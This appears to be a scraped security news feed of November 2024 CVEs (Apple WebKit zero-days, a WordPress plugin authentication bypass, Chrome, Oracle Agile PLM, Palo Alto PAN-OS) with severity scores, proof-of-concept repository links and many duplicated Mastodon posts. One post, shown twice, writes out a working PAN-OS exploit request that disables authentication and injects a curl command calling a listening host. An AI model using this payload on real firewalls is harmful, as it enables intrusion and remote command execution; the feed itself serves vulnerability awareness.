Apple fixes 2 zero-days exploited to breach macOS systems (CVE-2024-44309, CVE-2024-44308) helpnetsecurity.com/2024/11/20 #Don'tmiss #Hotstuff #Google #0-day #Apple #macOS #News #iPad #iOS

##

applsec@infosec.exchange at 2024-11-19T22:04:28.000Z ##

📣 EMERGENCY UPDATES 📣

Apple pushed additional updates for 2 zero-days that may have been actively exploited.

🐛 CVE-2024-44308 (JavaScriptCore) additional patches,
🐛 CVE-2024-44309 (WebKit) additional patches:
- Safari 18.1.1

#apple #cybersecurity #infosec #security #ios

##

applsec@infosec.exchange at 2024-11-19T19:45:33.000Z ##

📣 EMERGENCY UPDATES 📣

Apple pushed additional updates for 2 zero-days that may have been actively exploited.

🐛 CVE-2024-44308 (JavaScriptCore) additional patches,
🐛 CVE-2024-44309 (WebKit) additional patches:
- visionOS 2.1.1

#apple #cybersecurity #infosec #security #ios

##

applsec@infosec.exchange at 2024-11-19T18:47:56.000Z ##

📣 EMERGENCY UPDATES 📣

Apple pushed updates for 2 new zero-days that may have been actively exploited.

🐛 CVE-2024-44308 (JavaScriptCore),
🐛 CVE-2024-44309 (WebKit):
- iOS and iPadOS 17.7.2
- iOS and iPadOS 18.1.1
- macOS Sequoia 15.1.1

#apple #cybersecurity #infosec #security #ios

##

CVE-2024-44625
(8.8 HIGH)

EPSS: 4.35%

updated 2024-11-20T16:44:13

1 posts

Gogs <=0.13.0 is vulnerable to Directory Traversal via the editFilePost function of internal/route/repo/editor.go.

1 repos

https://github.com/Fysac/CVE-2024-44625

fysac@infosec.exchange at 2024-11-14T03:43:43.000Z ##

Today I am publishing the technical details of CVE-2024-44625, an unpatched RCE vulnerability in Gogs: fysac.github.io/posts/2024/11/

##

CVE-2024-10924
(9.8 CRITICAL)

EPSS: 0.04%

updated 2024-11-20T15:30:50

3 posts

The Really Simple Security (Free, Pro, and Pro Multisite) plugins for WordPress are vulnerable to authentication bypass in versions 9.0.0 to 9.1.1.1. This is due to improper user check error handling in the two-factor REST API actions with the 'check_login_and_get_user' function. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrat

7 repos

https://github.com/m3ssap0/wordpress-really-simple-security-authn-bypass-vulnerable-application

https://github.com/Trackflaw/CVE-2024-10924-Wordpress-Docker

https://github.com/MattJButler/CVE-2024-10924

https://github.com/m3ssap0/wordpress-really-simple-security-authn-bypass-exploit

https://github.com/julesbsz/CVE-2024-10924

https://github.com/RandomRobbieBF/CVE-2024-10924

https://github.com/FoKiiin/CVE-2024-10924

threatcodex at 2024-11-19T15:29:25.209Z ##

4,000,000 WordPress Sites Using Really Simple Security Free and Pro Versions Affected by Critical Authentication Bypass Vulnerability

wordfence.com/blog/2024/11/rea

##

krlaboratories at 2024-11-18T16:31:29.210Z ##

БІЛЬШЕ 4 МІЛЬЙОНІВ САЙТІВ WORDPRESS ПІД ЗАГРОЗОЮ

Більше 4 мільйонів сайтів на базі CMS WordPress є під загрозою через критичну вразливість, виявлену спеціалістами Wordfence Security у відомому плагіні Really Simple SSL та його PRO версії.

Це одна з найбільш серйозних вразливостей в плагінах WordPress за останні 12 років!

Загроза була виявлена 6 листопада 2024 року, має ідентифікатор CVE-2024-10924 та ступінь критичності 9.8 за шкалою CVSS. Уразливість дає можливість зловмиснику віддалено отримати доступ до будь-якого облікового запису Wordpress, включаючи Адміністратора, навіть коли ввімкнено функцію двофакторної автентифікації!

12-14 листопада 2024 року команда розробників Really Simple SSL випустила пропатчену версію обох плагінів 9.1.2, у якій вразливість була повністю усунена.

Технічний аналіз цієї вразливості опублікований на сайті Wordfence:
wordfence.com/blog/2024/11/rea

Висновки:

- Намагайтесь використовувати по мінімуму кількість додаткових плагінів на своєму сайті WordPress. Чим менше плагінів - тим менший ризик бути непомітно зламаним.
- Не використовуйте ламані, обнулені, крякнуті плагіни.
- Регулярно оновлюйте WordPress і усі його компоненти до останніх актуальних версій. Не затягуйте з цим.
- Будьте в курсі останніх новин з кібербезпеки, щоби вчасно дізнаватися про інциденти та реагувати на них.
- Проводьте резервне копіюванння сайтів, щоб була змога відновитись у разі зламу/атаки.

Якщо ви знаєте когось, хто використовує ці плагіни на своєму сайті, ми рекомендуємо поділитися з ним цією порадою, щоб забезпечити безпеку його сайту, оскільки ця вразливість становить значний ризик.

Кому потрібна допомога - звертайтеся, ми до ваших послуг: kr-labs.com.ua/blog/wordpress-

##

krlaboratories@infosec.exchange at 2024-11-18T16:31:29.000Z ##

БІЛЬШЕ 4 МІЛЬЙОНІВ САЙТІВ WORDPRESS ПІД ЗАГРОЗОЮ

Більше 4 мільйонів сайтів на базі CMS WordPress є під загрозою через критичну вразливість, виявлену спеціалістами Wordfence Security у відомому плагіні Really Simple SSL та його PRO версії.

Це одна з найбільш серйозних вразливостей в плагінах WordPress за останні 12 років!

Загроза була виявлена 6 листопада 2024 року, має ідентифікатор CVE-2024-10924 та ступінь критичності 9.8 за шкалою CVSS. Уразливість дає можливість зловмиснику віддалено отримати доступ до будь-якого облікового запису Wordpress, включаючи Адміністратора, навіть коли ввімкнено функцію двофакторної автентифікації!

12-14 листопада 2024 року команда розробників Really Simple SSL випустила пропатчену версію обох плагінів 9.1.2, у якій вразливість була повністю усунена.

Технічний аналіз цієї вразливості опублікований на сайті Wordfence:
wordfence.com/blog/2024/11/rea

Висновки:

- Намагайтесь використовувати по мінімуму кількість додаткових плагінів на своєму сайті WordPress. Чим менше плагінів - тим менший ризик бути непомітно зламаним.
- Не використовуйте ламані, обнулені, крякнуті плагіни.
- Регулярно оновлюйте WordPress і усі його компоненти до останніх актуальних версій. Не затягуйте з цим.
- Будьте в курсі останніх новин з кібербезпеки, щоби вчасно дізнаватися про інциденти та реагувати на них.
- Проводьте резервне копіюванння сайтів, щоб була змога відновитись у разі зламу/атаки.

Якщо ви знаєте когось, хто використовує ці плагіни на своєму сайті, ми рекомендуємо поділитися з ним цією порадою, щоб забезпечити безпеку його сайту, оскільки ця вразливість становить значний ризик.

Кому потрібна допомога - звертайтеся, ми до ваших послуг: kr-labs.com.ua/blog/wordpress-

#wordpress #vulnerability #cybernews #cybercrine #hacked #кібербезпека #новини #cybersecurity #ReallySimpleSSL #ReallySimpleSecurity #CVE_2024_10924 #infosec #hack

##

CVE-2024-11395
(8.8 HIGH)

EPSS: 0.04%

updated 2024-11-20T00:32:14

5 posts

Type Confusion in V8 in Google Chrome prior to 131.0.6778.85 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)

screaminggoat at 2024-11-19T19:06:32.994Z ##

Google Chrome security advisory: Stable Channel Update for Desktop
New Chrome version 131.0.6778.85/.86 for Windows, Mac and 131.0.6778.85 for Linux includes 3 security fixes, 1 externally reported: CVE-2024-11395 (high severity) Type Confusion in V8. No mention of exploitation.

##

screaminggoat@infosec.exchange at 2024-11-19T19:06:32.000Z ##

Google Chrome security advisory: Stable Channel Update for Desktop
New Chrome version 131.0.6778.85/.86 for Windows, Mac and 131.0.6778.85 for Linux includes 3 security fixes, 1 externally reported: CVE-2024-11395 (high severity) Type Confusion in V8. No mention of exploitation.

#Google #Chrome #chromium #vulnerability #CVE #CVE_2024_11395

##

screaminggoat at 2024-11-19T19:06:32.994Z ##

Google Chrome security advisory: Stable Channel Update for Desktop
New Chrome version 131.0.6778.85/.86 for Windows, Mac and 131.0.6778.85 for Linux includes 3 security fixes, 1 externally reported: CVE-2024-11395 (high severity) Type Confusion in V8. No mention of exploitation.

##

screaminggoat@infosec.exchange at 2024-11-19T19:06:32.000Z ##

Google Chrome security advisory: Stable Channel Update for Desktop
New Chrome version 131.0.6778.85/.86 for Windows, Mac and 131.0.6778.85 for Linux includes 3 security fixes, 1 externally reported: CVE-2024-11395 (high severity) Type Confusion in V8. No mention of exploitation.

#Google #Chrome #chromium #vulnerability #CVE #CVE_2024_11395

##

ekis@mastodon.social at 2024-11-20T17:54:58.000Z ##

CVE-2024-11395
Type Confusion in V8 in Google Chrome prior to 131.0.6778.85 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)

If you are security cautious might want to avoid using Chrome till this is fixed, if I understood it correctly. Feel free to correct me, I will be trying to build a PoC... in my lab

I just like saying '..in my lab'

##

CVE-2024-44309
(0 None)

EPSS: 0.04%

updated 2024-11-20T00:15:17.137000

28 posts

A cookie management issue was addressed with improved state management. This issue is fixed in Safari 18.1.1, iOS 17.7.2 and iPadOS 17.7.2, macOS Sequoia 15.1.1, iOS 18.1.1 and iPadOS 18.1.1, visionOS 2.1.1. Processing maliciously crafted web content may lead to a cross site scripting attack. Apple is aware of a report that this issue may have been actively exploited on Intel-based Mac systems.

apfeltalk@creators.social at 2024-11-20T07:31:10.000Z ##

iOS 18.1.1 und macOS Sequoia 15.1.1 schließen aktiv ausgenutzte Sicherheitslücken
Apple hat mit den neuen Updates iOS 18.1.1 und macOS Sequoia 15.1.1 bedeutende Sicherheitslücken geschlossen, die Beric
apfeltalk.de/magazin/feature/i
#Feature #iPad #iPhone #Mac #Apple #CrossSiteScripting #CVE202444308 #CVE202444309 #IntelMac #IOS1811 #JavaScriptCore #MacOSSequoia1511 #Sicherheitsupdate #Webkit

##

jos1264@social.skynetcloud.site at 2024-11-19T21:25:03.000Z ##

Apple Confirms Zero-Day Attacks Hitting Intel-based Macs securityweek.com/apple-confirm #Malware&Threats #Vulnerabilities #CVE202444308 #CVE202444309 #macOSSequioa #iOS1811 #Apple

##

jos1264@social.skynetcloud.site at 2024-11-19T21:25:03.000Z ##

Apple Confirms Zero-Day Attacks Hitting Intel-based Macs securityweek.com/apple-confirm #Malware&Threats #Vulnerabilities #CVE202444308 #CVE202444309 #macOSSequioa #iOS1811 #Apple

##

apfeltalk@creators.social at 2024-11-20T07:31:10.000Z ##

iOS 18.1.1 und macOS Sequoia 15.1.1 schließen aktiv ausgenutzte Sicherheitslücken
Apple hat mit den neuen Updates iOS 18.1.1 und macOS Sequoia 15.1.1 bedeutende Sicherheitslücken geschlossen, die Beric
apfeltalk.de/magazin/feature/i
#Feature #iPad #iPhone #Mac #Apple #CrossSiteScripting #CVE202444308 #CVE202444309 #IntelMac #IOS1811 #JavaScriptCore #MacOSSequoia1511 #Sicherheitsupdate #Webkit

##

jos1264@social.skynetcloud.site at 2024-11-19T21:25:03.000Z ##

Apple Confirms Zero-Day Attacks Hitting Intel-based Macs securityweek.com/apple-confirm #Malware&Threats #Vulnerabilities #CVE202444308 #CVE202444309 #macOSSequioa #iOS1811 #Apple

##

jos1264@social.skynetcloud.site at 2024-11-19T21:25:03.000Z ##

Apple Confirms Zero-Day Attacks Hitting Intel-based Macs securityweek.com/apple-confirm #Malware&Threats #Vulnerabilities #CVE202444308 #CVE202444309 #macOSSequioa #iOS1811 #Apple

##

threatcodex at 2024-11-20T17:27:16.977Z ##

Update now! Apple confirms vulnerabilities are already being exploited

malwarebytes.com/blog/news/202

##

screaminggoat at 2024-11-19T18:58:41.227Z ##

Apple exploited zero-days

Both zero-days reported by Clément Lecigne and Benoît Sevens of Google's Threat Analysis Group h/t: @applsec cc: @campuscodi @mttaggart @cR0w @briankrebs @ntkramer @iagox86 @dreadpir8robots @catc0n

##

screaminggoat@infosec.exchange at 2024-11-19T18:58:41.000Z ##

Apple exploited zero-days

Both zero-days reported by Clément Lecigne and Benoît Sevens of Google's Threat Analysis Group h/t: @applsec cc: @campuscodi @mttaggart @cR0w @briankrebs @ntkramer @iagox86 @dreadpir8robots @catc0n

#apple #zeroday #vulnerability #eitw #activeexploitation #cve #CVE_2024_44308 #CVE_2024_44309

##

apfeltalk@creators.social at 2024-11-20T07:31:10.000Z ##

iOS 18.1.1 und macOS Sequoia 15.1.1 schließen aktiv ausgenutzte Sicherheitslücken
Apple hat mit den neuen Updates iOS 18.1.1 und macOS Sequoia 15.1.1 bedeutende Sicherheitslücken geschlossen, die Beric
apfeltalk.de/magazin/feature/i
#Feature #iPad #iPhone #Mac #Apple #CrossSiteScripting #CVE202444308 #CVE202444309 #IntelMac #IOS1811 #JavaScriptCore #MacOSSequoia1511 #Sicherheitsupdate #Webkit

##

jos1264@social.skynetcloud.site at 2024-11-19T21:25:03.000Z ##

Apple Confirms Zero-Day Attacks Hitting Intel-based Macs securityweek.com/apple-confirm #Malware&Threats #Vulnerabilities #CVE202444308 #CVE202444309 #macOSSequioa #iOS1811 #Apple

##

jos1264@social.skynetcloud.site at 2024-11-19T21:25:03.000Z ##

Apple Confirms Zero-Day Attacks Hitting Intel-based Macs securityweek.com/apple-confirm #Malware&Threats #Vulnerabilities #CVE202444308 #CVE202444309 #macOSSequioa #iOS1811 #Apple

##

apfeltalk@creators.social at 2024-11-20T07:31:10.000Z ##

iOS 18.1.1 und macOS Sequoia 15.1.1 schließen aktiv ausgenutzte Sicherheitslücken
Apple hat mit den neuen Updates iOS 18.1.1 und macOS Sequoia 15.1.1 bedeutende Sicherheitslücken geschlossen, die Beric
apfeltalk.de/magazin/feature/i
#Feature #iPad #iPhone #Mac #Apple #CrossSiteScripting #CVE202444308 #CVE202444309 #IntelMac #IOS1811 #JavaScriptCore #MacOSSequoia1511 #Sicherheitsupdate #Webkit

##

jos1264@social.skynetcloud.site at 2024-11-19T21:25:03.000Z ##

Apple Confirms Zero-Day Attacks Hitting Intel-based Macs securityweek.com/apple-confirm #Malware&Threats #Vulnerabilities #CVE202444308 #CVE202444309 #macOSSequioa #iOS1811 #Apple

##

jos1264@social.skynetcloud.site at 2024-11-19T21:25:03.000Z ##

Apple Confirms Zero-Day Attacks Hitting Intel-based Macs securityweek.com/apple-confirm #Malware&Threats #Vulnerabilities #CVE202444308 #CVE202444309 #macOSSequioa #iOS1811 #Apple

##

threatcodex at 2024-11-20T17:27:16.977Z ##

Update now! Apple confirms vulnerabilities are already being exploited

malwarebytes.com/blog/news/202

##

screaminggoat at 2024-11-19T18:58:41.227Z ##

Apple exploited zero-days

Both zero-days reported by Clément Lecigne and Benoît Sevens of Google's Threat Analysis Group h/t: @applsec cc: @campuscodi @mttaggart @cR0w @briankrebs @ntkramer @iagox86 @dreadpir8robots @catc0n

##

screaminggoat@infosec.exchange at 2024-11-19T18:58:41.000Z ##

Apple exploited zero-days

Both zero-days reported by Clément Lecigne and Benoît Sevens of Google's Threat Analysis Group h/t: @applsec cc: @campuscodi @mttaggart @cR0w @briankrebs @ntkramer @iagox86 @dreadpir8robots @catc0n

#apple #zeroday #vulnerability #eitw #activeexploitation #cve #CVE_2024_44308 #CVE_2024_44309

##

AAKL at 2024-11-20T14:32:04.784Z ##

If you missed this yesterday, update your iPhone.This relates to CVE-2024-44308 and CVE-2024-44309.

Issues Emergency Security Update for Actively Exploited Vulnerabilities infosecurity-magazine.com/news

Apple security advisories: support.apple.com/en-us/100100

##

jos1264@social.skynetcloud.site at 2024-11-20T11:20:04.000Z ##

Apple fixes 2 zero-days exploited to breach macOS systems (CVE-2024-44309, CVE-2024-44308) helpnetsecurity.com/2024/11/20 #Don'tmiss #Hotstuff #Google #0-day #Apple #macOS #News #iPad #iOS

##

applsec at 2024-11-19T22:04:28.058Z ##

📣 EMERGENCY UPDATES 📣

Apple pushed additional updates for 2 zero-days that may have been actively exploited.

🐛 CVE-2024-44308 (JavaScriptCore) additional patches,
🐛 CVE-2024-44309 (WebKit) additional patches:
- Safari 18.1.1

##

applsec at 2024-11-19T19:45:33.314Z ##

📣 EMERGENCY UPDATES 📣

Apple pushed additional updates for 2 zero-days that may have been actively exploited.

🐛 CVE-2024-44308 (JavaScriptCore) additional patches,
🐛 CVE-2024-44309 (WebKit) additional patches:
- visionOS 2.1.1

##

applsec at 2024-11-19T18:47:56.429Z ##

📣 EMERGENCY UPDATES 📣

Apple pushed updates for 2 new zero-days that may have been actively exploited.

🐛 CVE-2024-44308 (JavaScriptCore),
🐛 CVE-2024-44309 (WebKit):
- iOS and iPadOS 17.7.2
- iOS and iPadOS 18.1.1
- macOS Sequoia 15.1.1

##

AAKL@infosec.exchange at 2024-11-20T14:32:04.000Z ##

If you missed this yesterday, update your iPhone.This relates to CVE-2024-44308 and CVE-2024-44309.

#Apple Issues Emergency Security Update for Actively Exploited Vulnerabilities infosecurity-magazine.com/news #cybersecurity #infosec

Apple security advisories: support.apple.com/en-us/100100

##

jos1264@social.skynetcloud.site at 2024-11-20T11:20:04.000Z ##

Apple fixes 2 zero-days exploited to breach macOS systems (CVE-2024-44309, CVE-2024-44308) helpnetsecurity.com/2024/11/20 #Don'tmiss #Hotstuff #Google #0-day #Apple #macOS #News #iPad #iOS

##

applsec@infosec.exchange at 2024-11-19T22:04:28.000Z ##

📣 EMERGENCY UPDATES 📣

Apple pushed additional updates for 2 zero-days that may have been actively exploited.

🐛 CVE-2024-44308 (JavaScriptCore) additional patches,
🐛 CVE-2024-44309 (WebKit) additional patches:
- Safari 18.1.1

#apple #cybersecurity #infosec #security #ios

##

applsec@infosec.exchange at 2024-11-19T19:45:33.000Z ##

📣 EMERGENCY UPDATES 📣

Apple pushed additional updates for 2 zero-days that may have been actively exploited.

🐛 CVE-2024-44308 (JavaScriptCore) additional patches,
🐛 CVE-2024-44309 (WebKit) additional patches:
- visionOS 2.1.1

#apple #cybersecurity #infosec #security #ios

##

applsec@infosec.exchange at 2024-11-19T18:47:56.000Z ##

📣 EMERGENCY UPDATES 📣

Apple pushed updates for 2 new zero-days that may have been actively exploited.

🐛 CVE-2024-44308 (JavaScriptCore),
🐛 CVE-2024-44309 (WebKit):
- iOS and iPadOS 17.7.2
- iOS and iPadOS 18.1.1
- macOS Sequoia 15.1.1

#apple #cybersecurity #infosec #security #ios

##

CVE-2024-43450
(7.5 HIGH)

EPSS: 0.13%

updated 2024-11-19T20:49:26.017000

1 posts

Windows DNS Spoofing Vulnerability

screaminggoat@infosec.exchange at 2024-11-13T00:02:20.000Z ##

@ryanaraine tweeted "👀 Interesting people reporting a very interesting bug 👀" over at the Bad Place™ and linked CVE-2024-43450 (7.5 high) Windows DNS Spoofing Vulnerability. The reporters are from "cnnic.cn" which is China Internet Network Information Center, affiliated with the Ministry of Industry and Information Technology.

I think he's implying that it's unusual for a PRC government institution affiliated with MIIT itself to report a widely impacting network vulnerability in a post-July 2021 “Regulations on the Management of Network Product Security Vulnerabilities” (RMSV). Maybe the attack complexity is too high to be worthwhile? CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H/E:U/RL:O/RC:C

##

CVE-2024-0793
(7.7 HIGH)

EPSS: 0.12%

updated 2024-11-19T20:25:31

4 posts

A flaw was found in kube-controller-manager. This issue occurs when the initial application of a HPA config YAML lacking a .spec.behavior.scaleUp block causes a denial of service due to KCM pods going into restart churn.

CVE-2024-21287
(7.5 HIGH)

EPSS: 0.09%

updated 2024-11-19T18:31:00

7 posts

Vulnerability in the Oracle Agile PLM Framework product of Oracle Supply Chain (component: Software Development Kit, Process Extension). The supported version that is affected is 9.3.6. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Agile PLM Framework. Successful attacks of this vulnerability can result in unauthorized access

screaminggoat at 2024-11-19T20:07:58.374Z ##

Oracle exploited zero-day: Security Alert CVE-2024-21287 Released

  • CVE-2024-21287 (7.5 high) Vulnerability in the Oracle Agile PLM Framework product of Oracle Supply Chain (component: Software Development Kit, Process Extension). The supported version that is affected is 9.3.6. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Agile PLM Framework. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Agile PLM Framework accessible data.

It was reported as being actively exploited "in the wild" by CrowdStrike.

Oracle's actual security advisory Oracle Security Alert Advisory - CVE-2024-21287 is useless because it doesn't mention exploitation.

h/t: @lawrenceabrams See Bleeping Computer reporting: Oracle warns of Agile PLM file disclosure flaw exploited in attacks
cc: @campuscodi @mttaggart @cR0w @ntkramer @iagox86 @dreadpir8robots @catc0n @harrysintonen @neurovagrant etc.

##

screaminggoat@infosec.exchange at 2024-11-19T20:07:58.000Z ##

Oracle exploited zero-day: Security Alert CVE-2024-21287 Released

  • CVE-2024-21287 (7.5 high) Vulnerability in the Oracle Agile PLM Framework product of Oracle Supply Chain (component: Software Development Kit, Process Extension). The supported version that is affected is 9.3.6. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Agile PLM Framework. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Agile PLM Framework accessible data.

It was reported as being actively exploited "in the wild" by CrowdStrike.

Oracle's actual security advisory Oracle Security Alert Advisory - CVE-2024-21287 is useless because it doesn't mention exploitation.

h/t: @lawrenceabrams See Bleeping Computer reporting: Oracle warns of Agile PLM file disclosure flaw exploited in attacks
cc: @campuscodi @mttaggart @cR0w @ntkramer @iagox86 @dreadpir8robots @catc0n @harrysintonen @neurovagrant etc.

#oracle #agile #oracleagileplm #zeroday #vulnerability #eitw #activeexploitation #cve #CVE_2024_21287

##

jbhall56 at 2024-11-20T13:40:51.566Z ##

Tracked as CVE-2024-21287 (CVSS score of 7.5), the zero-day affects Agile PLM version 9.3.6 and can be exploited remotely without authentication. securityweek.com/oracle-patche

##

oversecurity@mastodon.social at 2024-11-19T20:10:06.000Z ##

Oracle warns of Agile PLM file disclosure flaw exploited in attacks

Oracle has fixed an unauthenticated file disclosure flaw in Oracle Agile Product Lifecycle Management (PLM) tracked as CVE-2024-21287, which was...

🔗️ [Bleepingcomputer] link.is.it/7jwrwy

##

jbhall56@infosec.exchange at 2024-11-20T13:40:51.000Z ##

Tracked as CVE-2024-21287 (CVSS score of 7.5), the zero-day affects Agile PLM version 9.3.6 and can be exploited remotely without authentication. securityweek.com/oracle-patche

##

oversecurity@mastodon.social at 2024-11-19T20:10:06.000Z ##

Oracle warns of Agile PLM file disclosure flaw exploited in attacks

Oracle has fixed an unauthenticated file disclosure flaw in Oracle Agile Product Lifecycle Management (PLM) tracked as CVE-2024-21287, which was...

🔗️ [Bleepingcomputer] link.is.it/7jwrwy

##

jos1264@social.skynetcloud.site at 2024-11-19T11:40:03.000Z ##

Oracle patches exploited Agile PLM vulnerability (CVE-2024-21287) helpnetsecurity.com/2024/11/19 #productdevelopment #CrowdStrike #enterprise #Don'tmiss #Hotstuff #Tenable #Oracle #News

##

CVE-2024-52867
(8.2 HIGH)

EPSS: 0.04%

updated 2024-11-19T18:30:58

4 posts

guix-daemon in GNU Guix before 5ab3c4c allows privilege escalation because build outputs are accessible by local users before file metadata concerns (e.g., for setuid and setgid programs) are properly addressed. The vulnerability can be remediated within the product via certain pull, reconfigure, and restart actions. Both 5ab3c4c and 5582241 are needed to resolve the vulnerability.

CVE-2024-0012
(9.8 CRITICAL)

EPSS: 96.61%

updated 2024-11-19T17:17:29.723000

57 posts

An authentication bypass in Palo Alto Networks PAN-OS software enables an unauthenticated attacker with network access to the management web interface to gain PAN-OS administrator privileges to perform administrative actions, tamper with the configuration, or exploit other authenticated privilege escalation vulnerabilities like CVE-2024-9474 https://security.paloaltonetworks.com/CVE-2024-9474 .

Nuclei template

4 repos

https://github.com/hazesecurity/CVE-2024-0012

https://github.com/watchtowrlabs/palo-alto-panos-cve-2024-0012

https://github.com/Sachinart/CVE-2024-0012-POC

https://github.com/greaselovely/CVE-2024-0012

oots at 2024-11-19T20:32:29.395Z ##

How to hack a firewall:

POST /php/utils/createRemoteAppwebSession.php/aaaa.js.map HTTP/1.1
Host: {{Hostname}}
X-PAN-AUTHCHECK: off
Content-Type: application/x-www-form-urlencoded
Content-Length: 99

user=`curl {{listening-host}}`&userRole=superuser&remoteHost=&vsys=vsys1

labs.watchtowr.com/pots-and-pa

##

jos1264@social.skynetcloud.site at 2024-11-18T17:20:03.000Z ##

Palo Alto Reports Two More Bugs in PAN-OS That Are Being Actively Exploited thecyberexpress.com/palo-alto- #PaloAltoPANOSvulnerability #TheCyberExpressNews #VulnerabilityNews #Vulnerabilities #PaloAltoNetwork #TheCyberExpress #FirewallDaily #CVE20240012 #CVE20249474 #CyberNews #PANOS

##

oots@infosec.exchange at 2024-11-19T20:32:29.000Z ##

How to hack a #PaloAlto firewall:

POST /php/utils/createRemoteAppwebSession.php/aaaa.js.map HTTP/1.1
Host: {{Hostname}}
X-PAN-AUTHCHECK: off
Content-Type: application/x-www-form-urlencoded
Content-Length: 99

user=`curl {{listening-host}}`&userRole=superuser&remoteHost=&vsys=vsys1

labs.watchtowr.com/pots-and-pa

#CVE20240012 #CVE20249474 #CVE #CVE2024

##

jos1264@social.skynetcloud.site at 2024-11-18T17:20:03.000Z ##

Palo Alto Reports Two More Bugs in PAN-OS That Are Being Actively Exploited thecyberexpress.com/palo-alto- #PaloAltoPANOSvulnerability #TheCyberExpressNews #VulnerabilityNews #Vulnerabilities #PaloAltoNetwork #TheCyberExpress #FirewallDaily #CVE20240012 #CVE20249474 #CyberNews #PANOS

##

screaminggoat at 2024-11-19T15:48:04.095Z ##

watchTowr: Pots and Pans, AKA an SSLVPN - Palo Alto PAN-OS CVE-2024-0012 and CVE-2024-9474
With the release of security patches for Palo Alto Networks' exploited zero-days, watchTowr performed some patch-diffing and found the root cause of CVE-2024-0012: "We simply… supply the off value to the X-PAN-AUTHCHECK HTTP request header, and the server helpfully turns off authentication?!" and of CVE-2024-9474: "Somehow a user is able to pass a username containing shell metacharacters into the AuditLog.write() function, which then passes its value to pexecute()." The remote command execution vulnerability of CVE-2024-9474 is the ability to pass a curl command for the user value in the POST request; which allows the attacker to specify an arbitrary user, an arbitrary user role (&userRole=superuser) and be granted a valid PHP session.

##

threatcodex at 2024-11-19T14:28:46.687Z ##

Pots and Pans, AKA an SSLVPN - Palo Alto PAN-OS CVE-2024-0012 and CVE-2024-9474

labs.watchtowr.com/pots-and-pa

##

screaminggoat at 2024-11-18T19:18:33.674Z ##

CISA: CISA Adds Three Known Exploited Vulnerabilities to Catalog
So hot off the press that it's not even live yet!

  • CVE-2024-0012 (CVSSv4: 9.3 critical) Palo Palo Alto Networks PAN-OS Management Interface Authentication Bypass Vulnerability
  • CVE-2024-9474 (CVSSv4: 6.9 medium) Palo Alto Networks PAN-OS Management Interface OS Command Injection Vulnerability
  • CVE-2024-1212 (perfect 10.0 🥳) Progress Kemp LoadMaster OS Command Injection Vulnerability

##

screaminggoat at 2024-11-18T15:31:42.026Z ##

Unit 42: ⁠Threat Brief: Operation Lunar Peek, Activity Related to CVE-2024-0012
Unit 42 has additional Indicators of Compromise related to CVE-2024-0012 and CVE-2024-9474 Palo Alto Networks PAN-OS zero-day exploitation, tracked as Operation: Lunar Peek.

h/t: @cR0w cc: @briankrebs @GossiTheDog @ntkramer @iagox86 @dreadpir8robots @deepthoughts10 @mttaggart @catc0n @campuscodi and whoever else cares

##

screaminggoat at 2024-11-18T14:29:10.181Z ##

Palo Alto Networks 11/18 update: CVE-2024-0012 PAN-OS: Authentication Bypass in the Management Web Interface (PAN-SA-2024-0015)

The actively exploited zero-day now has a CVE ID: CVE-2024-0012* (9.3 critical) An authentication bypass in Palo Alto Networks PAN-OS software enables an unauthenticated attacker with network access to the management web interface to gain PAN-OS administrator privileges to perform administrative actions, tamper with the configuration, or exploit other authenticated privilege escalation vulnerabilities like CVE-2024-9474

Second actively exploited zero-day: CVE-2024-9474 PAN-OS: Privilege Escalation (PE) Vulnerability in the Web Management Interface
CVE-2024-9474 (6.9 medium) A privilege escalation vulnerability in Palo Alto Networks PAN-OS software allows a PAN-OS administrator with access to the management web interface to perform actions on the firewall with root privileges.

New Indicators of compromise at Unit 42: unit42.paloaltonetworks.com/cv

##

screaminggoat@infosec.exchange at 2024-11-19T15:48:04.000Z ##

watchTowr: Pots and Pans, AKA an SSLVPN - Palo Alto PAN-OS CVE-2024-0012 and CVE-2024-9474
With the release of security patches for Palo Alto Networks' exploited zero-days, watchTowr performed some patch-diffing and found the root cause of CVE-2024-0012: "We simply… supply the off value to the X-PAN-AUTHCHECK HTTP request header, and the server helpfully turns off authentication?!" and of CVE-2024-9474: "Somehow a user is able to pass a username containing shell metacharacters into the AuditLog.write() function, which then passes its value to pexecute()." The remote command execution vulnerability of CVE-2024-9474 is the ability to pass a curl command for the user value in the POST request; which allows the attacker to specify an arbitrary user, an arbitrary user role (&userRole=superuser) and be granted a valid PHP session.

#CVE_2024_0012 #CVE_2024_9474 #eitw #activeexploitation #vulnerability #zeroday #paloaltonetworks #panos #rootcauseanalysis #infosec #cybersecurity

##

screaminggoat@infosec.exchange at 2024-11-18T19:18:33.000Z ##

CISA: CISA Adds Three Known Exploited Vulnerabilities to Catalog
So hot off the press that it's not even live yet!

  • CVE-2024-0012 (CVSSv4: 9.3 critical) Palo Palo Alto Networks PAN-OS Management Interface Authentication Bypass Vulnerability
  • CVE-2024-9474 (CVSSv4: 6.9 medium) Palo Alto Networks PAN-OS Management Interface OS Command Injection Vulnerability
  • CVE-2024-1212 (perfect 10.0 🥳) Progress Kemp LoadMaster OS Command Injection Vulnerability

#cisa #cisakev #kev #knownexploitedvulnerabilitiescatalog #vulnerability #cve #CVE_2024_0012 #CVE_2024_9474 #paloaltonetworks #panos #zeroday #eitw #activeexploitation #progress #kemp #loadmaster

##

screaminggoat@infosec.exchange at 2024-11-18T15:31:42.000Z ##

Unit 42: ⁠Threat Brief: Operation Lunar Peek, Activity Related to CVE-2024-0012
Unit 42 has additional Indicators of Compromise related to CVE-2024-0012 and CVE-2024-9474 Palo Alto Networks PAN-OS zero-day exploitation, tracked as Operation: Lunar Peek.

h/t: cr0w cc: @briankrebs @GossiTheDog @ntkramer @iagox86 @dreadpir8robots @deepthoughts10 @mttaggart @catc0n @campuscodi and whoever else cares

#CVE_2024_0012 #CVE_2024_9474 #threatintel #infosec #cybersecurity #cyberthreatintelligence #OperationLunarPeek #LunarPeek #infosec #CTI #IOC

##

screaminggoat@infosec.exchange at 2024-11-18T14:29:10.000Z ##

